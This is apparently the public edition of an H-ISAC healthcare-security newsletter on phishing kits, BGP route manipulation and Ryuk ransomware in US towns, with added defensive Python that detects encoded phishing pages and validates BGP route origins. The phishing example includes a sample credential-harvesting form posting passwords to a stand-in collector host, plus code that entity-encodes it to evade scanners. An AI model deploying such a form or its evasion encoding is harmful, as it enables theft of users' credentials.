Adversarial #phishing kits, #BGP internet infrastructure and ransomware infecting cities and towns of all sizes.


TLP White: In this edition of Hacking Healthcare, we discuss the growth of Phishing-as-a-Service. We then check in on how decades-old internet infrastructure is fueling security concerns and internet outages. Finally, we examine the worrying trend of ransomware infecting cities and towns across the United States, and what that might mean for the future.

As a reminder, this is the public version of the Hacking Healthcare blog. For additional in-depth analysis and opinion, become a member of H-ISAC and receive the TLP Amber version of this blog (available in the Member Portal).


Welcome back to Hacking Healthcare.

Hot Links –

1. Phishing Demand Creates Supply.

While nation-state hackers have traditionally had the best tools, supporting infrastructure, and political cover to be the most harmful to those unfortunate enough to be in their crosshairs, the abilities of less well-resourced adversaries are always increasing. A reminder of this is the growing field of Phishing-as-a-Service. Where once a professional phishing scheme required substantial technical knowledge and resources (a native grasp of the target’s language, professional-looking website templates, the ability to host the supporting infrastructure, and innovative delivery methods), these new services provide ready-made phishing kits. Everything from hosting infrastructure, IT support, professionally designed templates, email lists sorted by target demographic, and even methods of evading detection can be purchased on the cheap.[1]

The Cyren security blog recently posted that 87% of phishing kits now include some form of evasive technique.[2] Their report details the six most common techniques as HTML character encoding, content encryption, inspection blocking, URLs in attachments, content injection, and legitimate cloud hosting.[3] The result of all this has been a 17% increase in phishing attacks in the first quarter of 2019, and an increase in organizations reporting a successful phishing attack from 30% in 2017 to 44% in 2018.[4] This phishing trend is likely to continue because of the lowered barriers to entry and the fact that phishing remains a successful attack method, despite considerable progress on defenses over the last few years.
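The first of the six evasion techniques above, HTML character encoding, works because a scanner that pattern-matches the raw page never sees the words it is looking for. The following is an added example, not code from the Hacking Healthcare post or from Cyren's report: it normalises a page by decoding HTML entities and percent-encoding until the text stops changing, then compares indicator hits before and after decoding. The sample pages, the `login-check.example` domain and the indicator patterns are all constructed for illustration.

```python
"""Added example: normalising an entity-encoded page before scanning it,
so the "HTML character encoding" evasion does not hide a credential form
from simple pattern matching. Not code from the post or from Cyren."""
import html
import re
from urllib.parse import quote, unquote

# Constructed sample: a plain credential-harvesting form of the kind a kit
# serves, posting to an external collector (a made-up reserved domain).
PLAIN_PAGE = (
    '<form action="https://login-check.example/collect.php" method="post">'
    '<input type="email" name="user"><input type="password" name="pass">'
    '</form>'
)


def entity_encode(text: str) -> str:
    """Write every character as a decimal HTML entity (what the kit does)."""
    return "".join(f"&#{ord(c)};" for c in text)


# Single-layer evasion: the whole form as entities.
ENCODED_PAGE = entity_encode(PLAIN_PAGE)
# Double-layer evasion: percent-encode first, then entity-encode the result.
DOUBLE_ENCODED_PAGE = entity_encode(quote(PLAIN_PAGE, safe=""))

# Constructed indicators of a credential-harvesting page; a real scanner
# would carry a much larger rule set.
CREDENTIAL_INDICATORS = (
    re.compile(r'type\s*=\s*["\']?password', re.I),
    re.compile(r'<form[^>]+action\s*=\s*["\']?https?://', re.I),
)


def normalise(markup: str, max_rounds: int = 5) -> str:
    """Decode HTML entities and percent-encoding repeatedly until the text is
    stable, so stacked encodings are peeled off one layer per round."""
    current = markup
    for _ in range(max_rounds):
        decoded = unquote(html.unescape(current))
        if decoded == current:
            break
        current = decoded
    return current


def scan(markup: str) -> dict:
    """Count indicator hits on the raw page and on the normalised page.
    A jump in hits after decoding is itself a signal of evasive encoding."""
    raw_hits = sum(bool(p.search(markup)) for p in CREDENTIAL_INDICATORS)
    normalised = normalise(markup)
    decoded_hits = sum(bool(p.search(normalised)) for p in CREDENTIAL_INDICATORS)
    return {
        "raw_hits": raw_hits,
        "decoded_hits": decoded_hits,
        "evasion_suspected": decoded_hits > raw_hits,
    }


if __name__ == "__main__":
    for label, page in (("plain", PLAIN_PAGE), ("encoded", ENCODED_PAGE),
                        ("double", DOUBLE_ENCODED_PAGE)):
        print(label, scan(page))
```

The useful signal is not only that indicators appear after decoding, but that they were absent before it: a page whose hit count rises once entities are decoded is encoding its content for no legitimate reason, which is worth scoring on its own.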


2. Underlying Internet Infrastructure Open to Manipulation.

In the somewhat unlikely event you have never heard of the Border Gateway Protocol (BGP), you have definitely been affected by it. To put it simply, BGP is what helps networks on the internet set the route for data transmitted across the internet’s many interconnected networks, and it operates today much the same as it has since 1994. The BGP system has scaled well and remains fairly robust as an operational protocol, but lately it has begun to show its age, particularly when it comes to security.

The BGP system is essentially based on trust. It trusts that all the various nodes and networks that provide the information used to calculate the best route for sending data efficiently are sending truthful, up-to-date information. When the information provided to BGP is wrong, intentionally or unintentionally, the data simply gets routed to or through unintended places. Furthermore, if the rerouted traffic is significantly heavier than the new route’s capacity, it can lead to outages, or it can cause increased latency if the new path is significantly more circuitous than the ideal one.

The most common cause of these mishaps is simple human error, which is what happened last week when a mistake by Verizon routed an enormous amount of traffic through a small ISP in Pennsylvania.[5] However, this “weakness” in the BGP system is also open to malicious hijacking. Those who are able to manipulate the system can route potentially valuable data through their preferred pathway, which is something some security researchers have accused China of doing in the past.[6]

Thankfully, there has been a growing movement to better secure the BGP system over the past few years. NIST in collaboration with DHS developed the Secure Inter-Domain Routing standards with an eye towards creating “a defense mechanism for the Border Gateway Protocol.”[7] Meanwhile, researchers at the Asia Pacific Network Information Center (APNIC) released a BGP defense system. And there have been widespread efforts to educate the organizations that implement BGP on best practices that can help secure them from malicious actors or unintended mistakes.
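The core of the SIDR work the paragraph refers to is Route Origin Validation: a network publishes a signed statement (a Route Origin Authorization, ROA) of which autonomous system may originate a prefix and how specific an announcement may be, and routers compare each announcement against it. The following is an added example, not code from the post, NIST, DHS or APNIC: it implements the validation outcome a router computes per RFC 6811 (valid, invalid, not-found) over constructed ROAs and announcements, and shows the common policy of dropping invalid routes. All prefixes and AS numbers are reserved documentation values chosen for the example.

```python
"""Added example: RPKI-style Route Origin Validation (RFC 6811 semantics)
over constructed ROAs and BGP announcements. Not code from the post or from
any of the organisations it mentions."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str      # address block covered by the authorisation
    max_length: int  # longest prefix length the holder permits to be announced
    origin_as: int   # the only AS authorised to originate it


# Constructed ROAs (documentation prefixes, private-use AS numbers):
# the holder of 203.0.113.0/24 lets AS64500 announce it and any
# more-specific down to /26; 198.51.100.0/24 may only be announced as a /24.
ROAS = [
    ROA("203.0.113.0/24", 26, 64500),
    ROA("198.51.100.0/24", 24, 64501),
]


def validate(prefix: str, origin_as: int, roas=ROAS) -> str:
    """Classify one announcement as 'valid', 'invalid' or 'not-found'.

    not-found: no ROA covers the prefix (nothing to check against).
    valid:     some covering ROA names this origin AS and allows this length.
    invalid:   ROAs cover the prefix but none matches (wrong origin, or the
               announcement is more specific than the holder allows: the
               classic shape of both a hijack and a leak)."""
    announced = ipaddress.ip_network(prefix, strict=False)
    covering = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix)
        if roa_net.version == announced.version and announced.subnet_of(roa_net):
            covering.append(roa)
    if not covering:
        return "not-found"
    for roa in covering:
        if roa.origin_as == origin_as and announced.prefixlen <= roa.max_length:
            return "valid"
    return "invalid"


# Constructed announcements as (prefix, origin AS) pairs, as a router's
# import filter would see them.
SAMPLE_UPDATES = [
    ("203.0.113.0/24", 64500),   # legitimate
    ("203.0.113.128/25", 64500), # legitimate more-specific within max_length
    ("203.0.113.0/27", 64500),   # too specific: beyond what the holder allows
    ("203.0.113.0/24", 64666),   # wrong origin: mis-origination or hijack
    ("198.51.100.0/25", 64501),  # right AS but holder only allows the /24
    ("192.0.2.0/24", 64500),     # no ROA at all
]


def filter_updates(updates, roas=ROAS):
    """Apply the usual policy: reject 'invalid', accept 'valid' and
    'not-found' (dropping not-found would black-hole every unsigned prefix).
    Returns (accepted, rejected), each a list of (prefix, asn, state)."""
    accepted, rejected = [], []
    for prefix, asn in updates:
        state = validate(prefix, asn, roas)
        (rejected if state == "invalid" else accepted).append((prefix, asn, state))
    return accepted, rejected


if __name__ == "__main__":
    ok, dropped = filter_updates(SAMPLE_UPDATES)
    for entry in ok:
        print("accept", entry)
    for entry in dropped:
        print("reject", entry)
```

Two points the code makes concrete: origin validation only checks who originated a route, not the path it took, so it stops mis-originations like the Pennsylvania incident and simple hijacks but not every leak; and the `not-found` state is why coverage matters, since a prefix with no ROA gets no protection at all.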


3. Ransomware Continues its Florida Vacation and Then Has its Day in Court (Systems).

If it feels like you just read headlines about ransomware in Florida, it’s probably because this is the third Florida town to be infected in recent weeks. Key Biscayne became the newest victim of the Ryuk ransomware after an employee unwittingly opened an infected attachment (please see article #1 above) on June 23rd.[8] The attack ultimately featured a combination of Ryuk, Emotet, and Trickbot malware working together to create a beachhead, spread laterally, and finally encrypt the files.[9]

And Florida wasn’t the only southern state to have a nasty run-in with ransomware last week. Georgia, coming off a prolonged ransomware saga last year in Atlanta, has been hit again. This time it was the Administrative Office of the Georgia Courts that was infected. Last Monday the Administrative Office’s website went down as the infection became known, and the organization released a statement that none of the infected systems contain any personally identifiable information.[10] While no one has yet commented on the ransomware used, there is widespread speculation that this is another Ryuk attack.

The Ryuk malware was originally linked to the Lazarus threat group of North Korean origin, but in recent months Ryuk, along with Emotet and Trickbot, has been commonly found on the open market. This will severely dampen the likelihood that those behind the attack will be identified with a high level of confidence. While the official sums demanded are often not made public, the two other Florida towns hit, Lake City and Riviera Beach, paid $490,000 and $600,000 in bitcoin respectively. Key Biscayne is home to a significantly smaller population than either of the other two cities, and it will be interesting to note whether the attackers scale their demands to maximize the potential for a payout.




Tuesday, June 9th:

-No relevant hearings


Wednesday, June 10th:

-No relevant hearings


Thursday, June 11th:

-No relevant hearings



International Hearings/Meetings


EU – No relevant hearings.


Conferences, Webinars, and Summits

–HEALTH IT Summit (Rocky Mountain) – Denver, CO (7/15/2019-7/16/2019)

–4th Annual Medical Device Cybersecurity Risk Mitigation Conference – Arlington, VA (7/23/2019-7/24/2019)

–Healthcare Cybersecurity Workshop – Dublin, Ireland (7/31/2019)

–Expo Health – Boston, MA (7/31/2019-8/2/2019)

–H-ISAC Medical Device Security Workshop – Plymouth, MN (9/17/2019)

–HEALTH IT Summit (California) – Los Angeles, CA (9/19/2019-9/20/2019)

–Healthcare Cybersecurity Forum – Los Angeles, CA (9/20/2019)

–HEALTH IT Summit (Northeast) – Boston, MA (10/3/2019-10/4/2019)

–Northeast Healthcare Cybersecurity Forum – Boston, MA (10/4/2019)

–2019 H-ISAC European Summit – Zurich, Switzerland (10/16/2019-10/17/2019)

–Health IT Summit (Midwest) – Minneapolis, MN (10/17/2019-10/18/2019)

–Healthcare Cybersecurity Forum (Midwest) – Minneapolis, MN (10/18/2019)

–Health IT Summit (Southwest) – Houston, TX (11/14/2019-11/15/2019)

–Southwest Healthcare Cybersecurity Forum (11/15/2019)

–Health IT Summit (Northwest) – Seattle, WA (11/19/2019-11/20/2019)

–Pacific Northwest Healthcare Cybersecurity Forum (11/20/2019)

–2019 H-ISAC Fall Summit – San Diego, CA (12/2/2019-12/6/2019)




Sundries –


–FDA urges patients to ditch vulnerable insulin pumps built by Medtronic

–Is offense really your best defense?

–You No Longer Own Your Face

–Microsoft to Require Multi-Factor Authentication for Cloud Solution Providers

–Popular genetic-mapping software potentially exposed patients’ data

–Google Play Store scrubs more than 100 adware-infected camera and gaming apps

–Vietnamese hacking group has a ‘Swiss Army knife’ of tools at its disposal

–Billions of Records Including Passwords Leaked by Smart Home Vendor



Contact us: follow @HealthISAC, and email at



[3] ibid